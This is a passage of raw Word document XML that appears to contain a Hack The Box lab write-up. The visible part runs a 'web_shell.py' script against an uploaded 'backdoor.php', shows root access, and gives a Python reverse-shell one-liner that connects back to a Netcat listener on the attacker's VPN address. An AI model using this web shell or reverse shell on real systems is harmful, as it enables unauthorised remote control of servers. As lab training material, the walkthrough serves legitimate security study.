        <w:t xml:space="preserve">            print("URL is invalid")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="152AF4E7" wp14:textId="296025B5">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Use the script as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="42D91145" wp14:textId="1760544C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ python3 web_shell.py -t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IP&gt;:3001/uploads/backdoor.php -o yes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>$ id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="670EFD86" wp14:textId="36C22EA1">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>To obtain a more functional (reverse) shell, execute the below inside the shell gained through the Python script above. Ensure that an active listener (such as Netcat) is in place before executing the below.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="602D2D32" wp14:textId="79869477">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">yovecio@htb[/htb]$ python3 web_shell.py -t </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3001/uploads/backdoor.php -o yes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="2F99118F" w:rsidR="2F99118F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;VPN/TUN Adapter IP&gt;",&lt;LISTENER PORT&gt;));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="2F99118F" wp14:paraId="2DC08235" wp14:textId="11CBAAD0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2F99118F">
        <w:rPr/>
        <w:t>le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8db8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D6A14"/>
    <w:rsid w:val="2F99118F"/>
    <w:rsid w:val="653D6A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6A14"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EC6BF233-AEAF-4651-8632-432C7F73F5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5bc82fecdc14b40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R3f88d4cf09c347c8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.file-get-contents.php" TargetMode="External" Id="Rc01ba33b504d4b92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="Re397f814a29f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2023-12-14T11:10:01.8810742Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-14T11:10:17.5156195Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>